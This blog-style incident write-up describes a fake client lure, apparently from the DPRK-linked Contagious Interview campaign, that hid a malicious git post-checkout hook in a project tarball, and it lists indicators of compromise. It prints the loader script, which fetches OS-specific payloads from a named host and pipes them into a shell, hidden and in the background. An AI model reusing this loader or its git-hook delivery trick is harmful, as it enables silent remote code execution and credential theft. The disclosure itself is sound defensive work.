It came in through my own contact form, which is part of why it worked. Not a LinkedIn cold-open, not a recruiter blast. A filled-out intake form, with a budget line and a start date, from a man named Sergio Yatskevich at a digital-healthcare company called Luminarybrand. He wanted a web platform for pharmaceutical traceability: track every pack of medicine from the manufacturer to the pharmacy to the patient, prove it's genuine, keep regulators happy. An MVP to show government and enterprise stakeholders.
If you wanted to design bait for me specifically, it would look a lot like this. Supply-chain provenance is one of the few places where a blockchain is the right answer instead of a buzzword, because the whole point is an audit trail nobody can quietly rewrite. So I leaned in. That was the idea.
The letter that was off by one
Here is the thing I almost missed. The company was real. You can search "Luminarybrand," find a UK healthcare business, see the branding, nod, and move on. The real one lives at luminarybrands.co.uk. Sergio wrote from luminarybrand.co.uk. One missing "s" at the end.
That single character is the entire con. A made-up company falls apart the moment you Google it. A typosquat of a company that actually exists borrows that company's reputation and hands it to the attacker. Your due-diligence reflex, the quick search that's supposed to protect you, becomes the thing that reassures you.
The slow part
I replied as dOrg, said this was squarely our work, and offered the obvious next step: a call. Pick a slot, fifteen minutes, let's scope it.
He didn't take it. He wrote back to say that before we jumped on a call he wanted to give me proper context, because in his experience most teams he'd spoken to never really understood the project. Then a wall of genuinely competent product detail: manufacturers issued drug-specific licenses, every unit tagged with a UUID, ownership transferred down the chain with a full trail, a public portal where a patient can verify a pack.
I read that as a man being thorough. In hindsight it was a man keeping me off the phone and buried in documents, which is exactly where the rest of this needs you to be. These operators avoid live human contact when they can. A call is friction. A call is a face. A thread is a delivery channel.
So I did what an engineer does when a brief is this good: I engaged for real. I mapped his requirements to an on-chain design, non-transferable manufacturer licenses, UUID registration at the point of manufacture, ownership transfer as the audit log itself, a scan-the-QR verification portal for consumers. I even flagged the gap these systems always have, that a printed QR can be photographed and slapped onto a counterfeit unless you bind the code to tamper-evident packaging. By the time his payload arrived, it was landing inside a warm, technical, credible conversation. That was the whole point of the warm-up.
The handoff
Then the documents came, as a Dropbox link to a gzipped tarball: Healthcare-Medical-Supply-Plan.tar.gz.
His instructions are worth quoting almost in full, because every sentence is load-bearing. The archive, he explained, was structured to mirror a Git repository. They couldn't host it as a public repo for "security and confidentiality" reasons, so here it was as a compressed file. I should review the overview and roadmap, check the README.md for how to navigate it, and then access and sign the NDA and contract from the "NDA" branch. Once the NDA was signed, we could arrange a formal discussion.
Read that again with bad intentions and it reorganizes itself.
Why ship a tarball with its own .git directory instead of a normal hosted repo? Because a public repo exposes the hooks to GitHub's tooling and to anyone who looks, and it's one click to report. A tarball keeps the same Git machinery alive while moving it somewhere nobody is watching. The confidentiality story is just the cover for that choice.
And the NDA branch is the part I keep coming back to, because it's genuinely clever. It manufactures a normal, businesslike reason to check out one specific branch. "Sign the NDA" sounds like diligence. What it actually means, mechanically, is "run git checkout." The victim pulls his own trigger and thinks he's being professional about it.
Where the body was buried
The working tree was clean. Real-looking overview, real-looking architecture, a helpful README. Nothing you're invited to read is hostile, which is the point.
The payload was in the plumbing. A fresh clone ships only inert *.sample templates in .git/hooks. This one had live hooks and extra files sitting in there. The one that matters is post-checkout, and post-checkout is nasty for a simple reason: it runs on its own every time you switch branches. No npm install, no build, no "run the project." Switching to that NDA branch he kept pointing me at is the detonation. And because it fires on every checkout, it gets to run again and again while you poke around.
The post-checkout hook was a small stub. Its job was to call a second script in the same directory, a script wearing a .sample extension to look like more Git boilerplate. It wasn't boilerplate. It was a plain, unencrypted shell script, and this is the heart of it:
case "$platform" in
Linux)
(bash -c "wget -qO- 'https://cleverstack-ext30341.vercel.app/api/l' | sh" > /dev/null 2>&1 &)
;;
Darwin)
(bash -c "curl -s 'https://cleverstack-ext30341.vercel.app/api/m' | sh" > /dev/null 2>&1 &)
;;
MINGW*|MSYS*|CYGWIN*)
cmd.exe //c start "" powershell.exe -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c curl.exe -s https://cleverstack-ext30341.vercel.app/api/w | cmd' -WindowStyle Hidden" 2>&1 &
;;
*)
(bash -c "curl -s 'https://cleverstack-ext30341.vercel.app/api/m' | sh" > /dev/null 2>&1 &)
;;
esac
It fingerprints the OS and serves a different payload from the same host for each one: /api/l for Linux, /api/m for macOS, /api/w for Windows. Anything it doesn't recognize falls through to the macOS endpoint. Every branch pipes a remote download straight into a shell, so nothing ever lands on disk for you to look at first. The redirect to /dev/null and the trailing ampersand mean it runs silent and detached while you're still reading the README. The Windows branch is the showy one: a hidden PowerShell spawns a hidden cmd that curls the payload and pipes it into cmd, stacking "WindowStyle Hidden" twice so you never see a flicker.
The hook is just the tripwire. The actual implant is whatever those endpoints handed back, and that's the part you want to recognize, not run.
Pulling the thread
The C2 was cleverstack-ext30341.vercel.app, hosted on Vercel and, by the time I got there, permanently suspended. Live analysis was off the table, which is fine, because anything that's been on the internet leaves a trail.
urlscan came back clean, which is a good lesson on its own: a clean urlscan is not a clean bill of health, it usually just means nobody scanned it while it was breathing. VirusTotal told the real story. The domain lit up with detections (virustotal.com/gui/domain/cleverstack-ext30341.vercel.app), and the trail from there led to a sample already sitting on MalwareBazaar, reported by a researcher, in circulation since April:
SHA-256: 1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352
https://bazaar.abuse.ch/sample/1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352/
So this was never about me. I walked into the tail end of a campaign that had been running for months.
What it actually was
I'm calling this by its tradecraft rather than a confession, but the fingerprints are not subtle. This is the DPRK-linked Contagious Interview campaign, also tracked as TaskJacker, MITRE ATT&CK group G1052, in the Lazarus cluster. The pattern matches line for line: a fake client or recruiter with a real-looking front, a long warm-up that keeps you off a call and inside the documents, a "project" delivered as an archive that quietly carries a Git repo, a second-stage loader hidden in git hooks, OS-specific payloads pulled from a Vercel app, and a victim profile aimed squarely at crypto and blockchain engineers. At the end of that chain sit the two implants this group is known for: BeaverTail, a JavaScript infostealer that also acts as a loader, and InvisibleFerret, a Python backdoor that goes after credentials, browser data, keychains, and wallets.
The detail I find most instructive is how this group keeps moving the tripwire earlier in the workflow. It used to live in package.json postinstall scripts, then in .vscode/tasks.json, then in fake font files. Now it's in a git hook that fires on a plain checkout, before you've built or run a single thing. The principle generalizes: anywhere your tooling will run a script on your behalf, assume someone will eventually hide a payload there.
Why it nearly landed
Strip away the malware and what's left is good social engineering. The company was real enough to survive a search. The brief was tailored tightly enough to my work that engaging felt like good business. The attacker was patient, refused the call, and kept everything in writing. The decoy docs were genuinely competent. And the trigger was disguised as diligence, "sign the NDA," so that following instructions and getting infected were the same action.
What saved me was boring habit. The hooks in .git looked wrong before I ran anything, and the missing "s" gave the rest away. I never let it execute against anything I cared about.
Indicators of compromise
Persona / sender
Sergio Yatskevich
sergio.yatskevich@luminarybrand.co.uk
Typosquat: luminarybrand.co.uk (impersonates the real luminarybrands.co.uk)
Cover story: "Luminarybrand" pharma supply-chain traceability MVP
Delivery
Initial vector: website contact form
Archive: Healthcare-Medical-Supply-Plan.tar.gz (contains its own .git/)
Lure: "check out the 'NDA' branch to sign the NDA/contract"
On-host
Populated .git/hooks/ (a clean clone has only *.sample templates)
Live post-checkout hook calling a second shell script
Loader disguised with a .sample extension (plain shell)
Behavior: OS fingerprint -> fetch per-OS payload -> pipe to shell -> background + silence
Network (C2, suspended)
cleverstack-ext30341.vercel.app
/api/l Linux | /api/m macOS + default | /api/w Windows
https://www.virustotal.com/gui/domain/cleverstack-ext30341.vercel.app
Sample
SHA-256 1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352
https://bazaar.abuse.ch/sample/1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352/
Hunt post-detonation
BeaverTail (JS infostealer/loader)
InvisibleFerret (Python RAT)
A note on the victim that isn't me: luminarybrands.co.uk is a real company being impersonated, not a participant. If you publish anything from this, say so plainly, and consider telling them and the registrar about the look-alike domain.
The served payloads are not retrieved or reproduced here. Only the dead loader is shown, as a detection signature.
Top comments (0)